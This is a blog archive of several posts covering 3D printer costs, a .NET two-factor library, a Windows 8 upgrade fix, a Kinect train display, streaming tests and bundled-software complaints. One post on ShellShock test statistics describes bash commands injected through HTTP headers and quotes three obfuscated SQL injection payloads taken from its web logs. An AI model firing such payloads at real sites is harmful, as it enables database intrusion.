3D Printer Shootout – Pro vs. Consumer

A few days ago, Scott Hanselman bought a $599 consumer 3D printer on Amazon. He then went on to share the next 16 hours worth of elation, frustration, moments of success and suicidal thoughts that go along with learning 3D printing on consumer hardware and open source tools.

My experience was even worse than his – as a company, we bought into the idea that $1000 worth of 3D printing machine should immediately bring us into the 3D manufacturing revolution. Months later, walking in to yet another night where the MakerBot printer had freaked out and spewed a massive tangle of spider-webby filament balls all over the floor, I was fully convinced that 3D printing, as an concept and industry, was a complete and useless pile of crap. We got 1 successful part for every 5 tries. We bought every kind of add-on available to heat up build plates, printed fan and enclosure mods, with some magic combination of painter’s tape and AquaNet hair spray being the only things that occasionally worked. Before writing it off altogether, we invested in the next level of equipment that held promise, and now work with a basic, professional-grade printer. We spent way more on payroll for someone to sit around and dink with the printer than we did on buying the professional printer. I made a rule that if anyone ever purchased any printer, part, or accessory from MakerBot ever again they would be immediately terminated. That was 2 years ago.

With that said, I challenged Scott to a Pro vs. Consumer 3D printing shootout – our Stratasys uPrint vs. his Simple Metal, to see the good, the bad, and the ugly of each approach, and find out how we compare on each side of the spectrum. We gave it one shot, no do-overs, using only the printer and the software that came with it, for honest comparison.

This blog post represents our “Pro” side of the experience. Open Scott’s side in another tab and compare.

The Model

We each printed the same model from the same source – a coffee cup .STL from Thingiverse, available here. (For the uninitiated, a .STL file to a 3D printer is more or less like a .PDF to your laserjet office printer.) It’s not a super crazy shape, but at the same time requires a bit of support with curved surfaces – about what the “average” 3D print would be.

The Setup/Costs – Stratasys uPrint SE Pro

This is the bad news on our side – you get what you pay for. Stratasys makes the uPrint SE Pro as one of their entry level, professional grade models. It prints a single color at a time, with a single type of material (ABS). To duplicate our setup for this print, you would need the following:

uPrint SE Pro Printer and Dissolving Bath – about $22,000

1 Spool of Model Material (Black) – $205.00 (produces 42 cubic inches of printing)

1 Spool of Support Material – $200.00 (42 cubic inches worth)

Box of Build Plates – $125.00 for 24 (you need one for each print, so it costs about $5.20/each)

Soluble Concentrate – $149.00 for 12 bottles (dissolves support material, aka fancy drain-O)

Warranty Support – $2,000/year – because it does break from time to time.

Add a little bit of shipping, and for a mere $25K you’re ready to print your very own coffee cup.

Setting Up – Hardware

The good news is, all of our supplies come from the manufacturer of the printer – so the major plus on the “Pro” side is that everything works together.

First, we take a build plate out of the box.

Photo Jan 30, 1 52 50 PMPhoto Jan 30, 1 53 00 PM

They are plastic and have a texture on them that is magic, because it sticks to 3D material once and cannot be reused. If we are printing something small, then sometimes we can use one corner of the build plate for one print, then another corner later, but it just depends on the day.

The build plate snaps into place on a platform that is extremely solid – Stratasys seems to over-engineer their hardware, which is nice.

Photo Jan 30, 1 53 08 PMAnim_LoadBuildPlate

Next, printers need material, so we load both the model material (what our print will actually be made of), and the support material (what the printer uses as filler to support overhanging surfaces, and gets dissolved later).

It comes in a “space bag” and gets loaded into a cartridge.

Photo Jan 30, 1 48 54 PMPhoto Jan 30, 1 48 59 PMPhoto Jan 30, 2 22 57 PM

Look closely – you see that little red thing?

Photo Jan 30, 2 23 26 PM

That piece acts as a flow-meter for your material spool, and tracks how much material you have left.

Photo Jan 30, 2 23 19 PM

Unfortunately, this is what I call the “DRM” of 3D printing. This little module makes sure that you are using a Stratasys material spool, and not material from other vendors. It’s one-way and cannot be “rewound”, so you can sometimes end up with a bit of material left over and the module thinks you’re already done, thus rendering the extra material unusable.

Aside from that, we load the spools, which is a matter of sliding them in and pressing “Load” on the printer panel.

Photo Jan 30, 2 23 37 PMAnim_LoadMaterialBayAnim_LoadModel

Now we’re ready to do some printing!

I tried to get a great “action shot” timelapse of the print by taping a GoPro to the inside of the door. It’s a little tight in there, so I cut the handle off the build plate to make room for it.

Photo Jan 30, 2 21 39 PM

That worked great until the printer heated up, the tape turned to goo and fell off, and the GoPro shut itself down at 125 degrees F. So I had to settle for a GoPro shot outside the door instead.

Photo Jan 30, 2 41 46 PM

Setting Up – Software

With this type of printer, you work with Stratays’s “Catalyst” software. Again, everything just works together – no mucking around with config’s and jumping through multiple tools, which is nice.

  1. Download the .STL from Thingiverse.
  2. Add the .STL to Catalyst.
  3. Press “Auto Orient” and “Add to Pack”, progress bars fly and magic happens. (Really, software is just calculating the most efficient way to print it, where the coffee cup needs supports and so forth.)
  4. Drag it to position it on the build plate where I want it to print.08_AddToPack
  5. Send/queue the print to the printer.
  6. Hit the blinking “Start Model” button on the printer’s front panel.Photo Jan 30, 2 42 55 PM09_CatalystStatus


I hit print and walked away. The printer tells me % complete and time remaining (7 hours and 29 minutes) and is also monitored in the Catalyst software.

Photo Jan 30, 3 39 11 PMPhoto Jan 30, 5 59 11 PM

The printer is very conscious of interrupting airflow, so a magnetic latch engages and prevents us stupid humans from opening the door mid-print, without the software’s permission.

This print ultimately took 8 hours, 22 minutes, at 0.1mm resolution, used 4.84 cubic inches of model material, and 0.433 cubic inches of support material.


Out pops our 3D printed coffee cup!

Photo Feb 02, 11 32 09 AMPhoto Feb 02, 11 32 54 AMAnim_RemoveCup

You can see the model material (in black) and the support material (in white). The white has to disappear, so to do that, we dunk the whole thing in a hot bath.

Photo Feb 02, 11 34 31 AMPhoto Feb 02, 11 34 45 AMAnim_InBath

The bath comes with, and is considered part of the printer. It’s a highly concentrated liquid (resembles Drain-O) mixed with water. We have to change it out every month or so. This unit heats up the liquid, and has a hot-tub style jet inside to keep a continuous flow of water over the part. We use big rubber gloves to prevent contact with this solution on bare skin.

All Done

We lift the container out of the bath, and what remains is our coffee cup and build plate without support material.

Photo Feb 02, 3 32 48 PMAnim_BathOut

A quick rinse, and we’re ready for coffee.

Photo Feb 02, 3 38 17 PMPhoto Feb 02, 3 38 10 PM

Cost of a Coffee Cup

In direct costs, we used $23.62 in model material, $2.06 in support material, and $5.20 build plate, for a total of $30.88. We have a fancy spreadsheet that calculates our total cost (printer cost over its lifespan, average reusable supplies based on our normal print volume), and our average cost per cubic inch of model printed is about $11.80. So if a customer asked us to print this coffee cup, it would run about $58.00.

On to Scott for the conclusion…

What does the end-result look like in cost/value/process? Was Scott able to print it in one shot without drama, or did 3D printer parts and a tangled mess of open-source bits come flying out of the nearest window in a fit of rage? How close are consumer printers to competing with professional printers in ultimate time and value?

We shipped Scott our version of the coffee cup, and he tallied the final scores. See what he had to say…


Some stats from ShellShock test tool analysis

It’s been an interesting past few days. As you can probably tell from the counters at http://shellshock.brandonpotter.com, the vulnerability test tool logs some statistical information.

When the tool sends a HTTP request, it contains a special URL that, if successful, lets us know that the bash command was executed on the remote system, and via which type of HTTP header embed was successful in executing the command.

At the time of this post, a little over 121,000 tests have been run, representing approximately 88,000 unique hosts. The vast majority of systems have not been affected in a way that this tool detects. Last week, it was around 8% of systems, and as of today that number has dropped closer to 6% and continues to drop. Here is the breakdown of vulnerabilities that the tool has found:

  • 35% – Cookie Attack – These sites were susceptible to a bash command embedded in a Cookie HTTP header.
  • 33% – Referer Attack – Bash command embedded in a Referer HTTP header.
  • 32% – User-Agent Attack – Bash command embedded in a User-Agent header.

So, it’s roughly evenly distributed across HTTP headers, but Cookie is the most vulnerable by a few points.

The test tool also uses a few different commands, since it depends on wget or curl and these may be located in different locations. /usr/bin/wget is by far the most successful, with 52% of the vulnerabilities identified through it. (Not that this matters, since most intentional attacks would likely focus on doing something a little more evil than wget’ing a URL, but it has been interesting to see which worked.)

Note: Keep in mind that this is a HTTP test tool only, and while HTTP is the easiest and most open attack point to your servers, it is not necessarily the only way this can be exploited if you didn’t patch. For the test tool to find a vulnerability, you must have a vulnerable Bash shell, in addition to a CGI script / environment running on your web server that calls Bash to do something.

On a different, more mildly interesting note of how folks are testing their junk…

There is a disclaimer that the test tool should only be used on your own sites. Of the crazy people, the misfits, the rebels, the troublemakers:

  • 695 people have tested google.com – fear not, they have things under control over there now.
  • 259 people have tested facebook.com – uncle Mark would be proud.
  • 155 people have tested shellshock.brandonpotter.com (y’all think you’re funny)
  • 75 people have tested (again this is why we can’t have nice things)

A few of the popular sites have been blocked now, since it’s just a waste of resources at this point testing them over and over. I’m no fun.

Looking through the web logs, honorable mention goes to the good people testing these “sites”…

  • -1 or 1=1 and (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  • 1′ || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ‘
  • (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

Implementing Free Two-Factor Authentication in .NET using Google Authenticator

Username/password combinations don’t cut it anymore, and Two-Factor authentication is a great way to help secure user accounts. If you have an account with a system that supports it, you should be using it. Likewise, if you develop systems that require users to log in with a username and password, you should be offering it. By using two-factor authentication, you dramatically reduce the attack footprint – no longer would a nefarious individual have to just guess your password, but they would have to guess your password AND a PIN number that changes every couple of minutes.

We are in the middle of adding two-factor auth to a few of our own systems. There are a few sites (like Authy) that will operate this as a cloud service for you at a monthly or usage cost, but there’s no need. Google offers a completely free solution via the Google Authenticator app for iOS and Android, with an equivalent app just called ‘Authenticator’ for Windows Phone. I was surprised there were no really good libraries to use this method of two-factor authentication in an implementation. So, I made one.

What is two-factor authentication?

Two-factor authentication, as the name implies, requires users to supply normal credentials (a username and password, for example), but adds a second, real-time token to the login to verify the user’s identity.

Old-School Tokens


You may have seen these RSA keys floating around in Enterprise IT departments. These have been around forever, but have normally been a pain to implement and support.

Text Tokens

Some forms of two-factor authentication will text you a one-time unique token when needed. And that is fairly easy to implement. However, text tokens have a few drawbacks:

  • Not everyone is within cell carrier service all the time
  • Text costs can still be prohibitive (when traveling internationally, for example)
  • Sending true text/SMS messages costs money, through services like Twilio

Two-Factor Apps

Fortunately, this problem is easily solved by apps, and Google Authenticator and its similar alternatives are my pick.

There are others, but that should cover most users pretty well.

The workflow on this is straightforward, and can be used offline – tokens are algorithm-generated, and do not require a live internet connection on the user’s device.

  1. Your system/web site/app generates a two-factor token for the user. Perhaps a GUID, or any unique identifier string specific to that user.
  2. You give the user a code to add to the Google Authenticator app, or show them a QR code to scan for the easy way.
  3. Google Authenticator then generates a 6-digit PIN code every 30 seconds. Prompt the user for this code during their login, and validate it!

It looks like this on iPhone:


Try it out!

Go get the app and give it a try to see how it works – I set up a sample workflow here: http://GAuthTwoFactorSample.azurewebsites.net

Scan the QR code into Google Authenticator, and then try validating your PIN code.

Now, on to implementation…

This is supposed to be easy, so start by grabbing the NuGet package GoogleAuthenticator (here’s a link).


Present User Setup QR Code / Manual Entry Code with GenerateSetupCode

Users have two options when setting up a new Google Authenticator account. If using a mobile device, they can scan a QR code (easiest), or they can enter or copy/paste a manual code into the app.

Generating this information takes a couple lines of code:

TwoFactorAuthenticator tfa = new TwoFactorAuthenticator();
var setupInfo = tfa.GenerateSetupCode("MyApp", "user@example.com", "SuperSecretKeyGoesHere", 300, 300);

string qrCodeImageUrl = setupInfo.QrCodeSetupImageUrl;
string manualEntrySetupCode = setupInfo.ManualEntryKey;

GenerateSetupCode requires a couple arguments:

  1. Issuer ID – this is the issuer ID that will appear on the user’s Google Authenticator app, right above the code. It should be the name of your app/system so the user can easily identify it.
  2. Account Title – this will be displayed to the user in the Google Authenticator app. It cannot have any spaces (if it does, the library will filter them). The user’s e-mail address is appropriate to use here, if that works for your system.
  3. Account Secret Key – this is the unique user key that only your system knows about. A good length for this is 10-12 characters. Don’t show this to the user! Your users should never see it. I exposed it on the demo site just to show what’s going on.
  4. QR Code Width – width (in pixels) of generated QR code image
  5. QR Code Height – height (in pixels) of generated QR code image

It returns an object with a few notable properties:

  1. QrCodeSetupImageUrl – the URL to the QR code image that the user can scan (powered by Google Charts)
  2. ManualEntryKey – if the user can’t scan the QR code, this is the string they will need to enter into Google Authenticator in order to set up the two-factor account.

Validate a user’s PIN with ValidateTwoFactorPIN

Prompt the user for their current PIN displayed in Google Authenticator, and validate it:

TwoFactorAuthenticator tfa = new TwoFactorAuthenticator();
bool isCorrectPIN = tfa.ValidateTwoFactorPIN(“SuperSecretKeyGoesHere”, “123456”);

That’s it!

About Clock Drift

Given that this two-factor authentication method is time-based, it is highly likely that there is some time difference between your servers and the user’s device. With these PIN codes changing every 30 seconds, you must decide what an acceptable ‘clock drift’ might be. Using the above code samples, the library will default to a clock drift tolerance of +/- 5 minutes from the current time. This means that if your user’s device is perfectly in sync with the server time, their PIN code will be ‘correct’ for a 10-minute window of time. However, if their device time is more than +/- 5 minutes off from your server’s time, the PIN code displayed on their device will never match up.

If you want to change this default clock drift tolerance, you can use the overloaded version of ValidateTwoFactorPIN, and provide a TimeSpan.

That’s all – hope this library is useful and makes two-factor authentication a no-brainer.

Windows 8 Setup: Setup has failed to apply migration data

I imagine there are a lot of ways a Migration installation on Win 8 could fail, but just to share my fix…

I did a Windows 8 Upgrade from Windows 7, and about 30% into the Migration phase, this error:

Setup has failed to apply migration data.

… Followed by a rollback to Windows 7.

This error tells you nothing – very frustrating. Look in the logs located in C:\$WINDOWS.~BT\Sources (surf around in there and you’ll find the log file that applies, possibly in the \Migration folder).

In my case, I noticed an entry that pointed to a Migration Error – it couldn’t move my desktop.ini file in my Music folder. It was looking for C:\Users\bpotter\Music\desktop.ini and couldn’t find it, failed the migration, and triggered a rollback.

I deleted the desktop.ini file (I don’t really care if I lose the folder view settings for my Music folder) and the install and migration completed successfully.

Behind the Scenes with the Kinect Train Build

It’s been a little while since the last Christmas project, so it was time to do something again.

This year, I started out with the following criteria for the Christmas for the City display:

  • Something interactive
  • Something that gets more fun as more people join in
  • Something that lets groups of people compete


The weekend before, my wife came home with a Nestle model train she got at a toy sale for $20:


ABBButtonThis was great – trains and Christmas go together, and if the train could be driven by some input, we have the beginning of an interactive display. My plan at this point was to mount a series of industrial buttons, and wire them to a Netduino. The faster more kids pushed buttons, the faster the train would go.

However, I was running a little low on time at this point, so I needed something a little simpler. I was thinking of what might be possible while I was watching TV, and noticed my Kinect sitting under the TV. That was perfect. The more motion in front of the depth camera, the faster the train goes.

Measuring Motion

Using the Kinect library, I wrote a small app that grabbed each camera frame and passed it into an AForge.NET motion detection library. This gave me a motion analysis similar to this picture, where red areas represent “things that have moved in the last second or so”.


By counting the number of “motion pixels” each second, I ended up with what I coined to be the “motion number”. This could be 0 to 150,000 to 600,000 depending on how much motion was happening. I translated this into a percentage based on the max value seen since application start. So now we have a “motion percentage” from 0-100%. This will more or less serve as the value we need for the train throttle.

Mounting the Train

Trains, sensitive electronics, and anything else not bolted down or secured don’t last very long in front of kids, so in order to keep the train from being kicked, shoved, punched, or stolen, it needed some kind of enclosure.


For this I used some Bosch Aluminum Profiles – this stuff is amazing, we use it for just about everything. Our awesome distributor we use at work fabbed/cut pieces for me in a day and then it was off to the assembly area – the area between the couch and the dining room table. Winking smile


This is also the point where I found out our new puppy hates portable drills..


OK, so one problem.

I set up the Nestle train and… it didn’t work. Either the engine or the controller didn’t work. Still not sure what the issue was, but I had come too far now to abandon this one.

This was Saturday. I had the rest of the night and Sunday to finish this thing. I called The Train Loft in Winston-Salem Saturday evening. They were closing in 15 mins but Jeff stayed late so I could come get another train. They had an amazing display – not something I was going to attempt:


Anyway, Jeff hooked me up with a Polar Express train set, and tricked up the track a little bit with a figure-8 instead of just the oval. Project officially over-budget at that point, but hey, Polar Express and Christmas go together, right?

Controlling the Train Throttle

What I thought was the easy part actually became the hardest. Turns out that train voltage is weird in a lot of ways (this train used AC, not DC), and controlling it via a computer is not that easy. I looked at various options for this, even trying to use an AC dimmer limited in software as to not overload the train. This got risky quickly, so I opted for a more simple mechanical control on the actual train controller. I pulled out the Lego Mindstorm NXT programmable controller and modified the train controller handle to attach to NXT…

The before:


The after:


While it looked cool, the “conveyor track” had a lot of slippage in it. Had to modify it further to couple the servo motor directly to the controller, and then I was in business.


Making it into a Game

So, now I had a “motion percentage” to use as a throttle value, a way to control the train via software, and a mounting rig.

Now, I just had to make it into a game. So I wrote an app with this workflow:

  • Plays a Polar Express intro clip with the instructions (“move your body to make the train go”)
  • Gives a 3, 2, 1 countdown
  • For 30 seconds, enables Kinect, plays a Polar Express theme song while the train runs, displays the “motion percentage” in 0-400mph (yes, not really to scale, but hey…), and displays the “distance traveled” by the train
  • After 30 seconds, stop train and display high scores (how far the train went in the 30 seconds)
  • Repeat


I wrapped all that up, and our awesome Christmas for the City volunteers helped set up the rig at the convention center. Here are some pics of what it looked like:





Overall, this worked out great. It was a self-contained rig most of the time running one “round” every minute. Kids participated in nearly every round in the 6-hour period during the event. We had groups of kids competing, groups of adults competing, and a few “die-hards” with sweat pouring down their faces, and most of all a ton of smiles.

One of my favorite parts of the night was when one kid came over and played a few rounds, and then went to see Santa across the room and asked him for “a Polar Express dance game just like that one”.

All in all, I think I achieved the initial objectives, and combined some great hardware components together in a short amount of time!

Testing how Smooth Streaming chokes

Just for fun, I tested Big Buck Bunny being served through IIS Media Services from the local disk, running on an Amazon EC2 Micro instance (the smallest available). This is a fairly lightweight server, i.e. something you would never want to run in a production environment. Consider this the streaming equivalent of “Will it Blend?”…

The results are in – when it’s going well, it’s surprisingly great, and when it’s not going well, it’s terrible. 😉

Total Chunks: 2691
Chunks Tested: 2691
Manifest Download Time: 310ms
Avg Video Chunk Response Time: 357ms
Avg Audio Chunk Response Time: 61ms

Excellent Chunks: 590 (21.92%)
Good Chunks: 1821 (67.67%)

Warning Chunks: 68 (2.53%)
Degraded Chunks: 6 (0.22%)
Poor Chunks: 206 (7.66%)

Stream 0: video, 2962kbps, 2056kbps, 1427kbps, 991kbps, 688kbps, 477kbps, 331kbps, 230kbps
Stream 1: audio, 128kbps

Things go OK around 89% of the time. But when they don’t, it crashes and burns…


Yikes. You can almost feel the Silverlight players freaking out. 😉

IIS Smooth Streaming Performance Testing Tool

If you are deploying a Smooth Streaming infrastructure, you already know it’s all HTTP-based. Requests for little video chunks hit your web server, and your web server looks up the correct video “chunk” within the audio/video file and serves it up.

However, it’s can be difficult to get a good benchmark on how your infrastructure is doing at serving up chunks, especially when your Silverlight clients are seeing random buffering errors or you run into scaling problems.

First off, there is a lot of information available from the Smooth Streaming Health Monitor app – In a couple seconds you can have a trace of what decisions the Silverlight Adaptive Streaming Media Element is making and export that out to Excel.

But when you just need comprehensive chunk data on all bitrates to diagnose how your origin/CDN is doing, I made this app (almost called it “Chunker”):


Enter the manifest URL of the on-demand smooth stream you want to test (note that this does not currently support live or composite manifests), for example: http://server.com/streams/BigBuckBunny.ism/Manifest

Once you click Begin Test, a new test tab will open and start requesting chunks based on the manifest information. The results will tell you if you may have a problem with your disk IO on your origin or some other problem preventing chunks being delivered in a timely manner.

Note: Only the first 1000 bytes (almost 1K) of each chunk is downloaded. The point here is not to test bandwidth, but rather test your infrastructure’s performance as it relates to reading/seeking fragments and assembling chunks.

Hopefully based on the assessment of each chunk, you can get an idea of how your CDN / origin / standalone box is doing at delivering chunks.

Run Smooth Stream Performance Testing Tool (ClickOnce)

Visual Studio tip: Turn off #region when generating interface code

I’ve gotten to the point where I don’t like #region tags in code – it’s what you do when you need to sweep some code under a rug.

As such, it’s really annoying to me when implementing an interface and VS generates nice #region tags all the time.

Props to this StackOverflow question/answer for the solution.

Tools > Options > Text Editor > C# > Advanced > uncheck “Surround generated code with #region”.


Punished for not installing a toolbar!

This one was a new one… I thought having to avoid toolbars bundled with the application I actually wanted was the punishment, but here’s a new one: When I unchecked “Install the new Bing Bar”, the Next button actually turned into a disabled 30-second countdown!


I guess this is a new technique… Punish with Patience. 😉

Dear Adobe: This is NOT okay

According to RIAStats.com, Adobe Flash is installed on over 96% of computers.

That’s why I was astonished at the most recent Flash update to 10.1. This morning I was prompted to update Flash because of a security issue via the latest update of Firefox. No problem, however, this was the first clue that Adobe was starting to abuse their place as a popular browser plugin:


See that? By default, “Include in your download” – McAfee Security Scan Plus. I’ve used McAfee. I’m not fond of their software. I don’t want it. I just want Flash. No problem… I unchecked “Include in your download” and downloaded Flash player.

So then I downloaded the Adobe Download Manager (let’s not get into the pet peeve of downloading a downloader), and to my surprise:


Flash Player at least asked me to accept the license terms. Not only did McAfee Security Scan Plus download and install automatically when I specifically unchecked that option – it installs quickly and automatically with no confirmation. Almost like they knew I would say no if given the chance.


So Adobe, here’s my list of grievances:

  1. Attempting to include third-party software by default, especially when it isn’t related to what I actually want (and you know that), is unethical.
  2. Browser plugin runtimes are to be treated as sacred. We as developers use them to bring great experiences to the web, and in turn, get users to install your product. It is imperative that our users trust your runtime. You have disrespected us, disrespected the users we serve, and destroyed that trust by making such a move.
  3. Waiting until version 10 and 96% browser plugin market penetration to do this is unacceptable. Being the #1 rich content plugin comes with an industry-wide responsibility.
  4. Including the download anyway, when I specifically unchecked the option, turns a previously respected Flash runtime into malware.

Please reconsider this delivery model. This is not about Flash in particular, but it is about users being able to trust the applications we deliver to them. The more we leave users with a bad taste in their mouths after updates, the less they’ll update… and that ultimately hurts us all.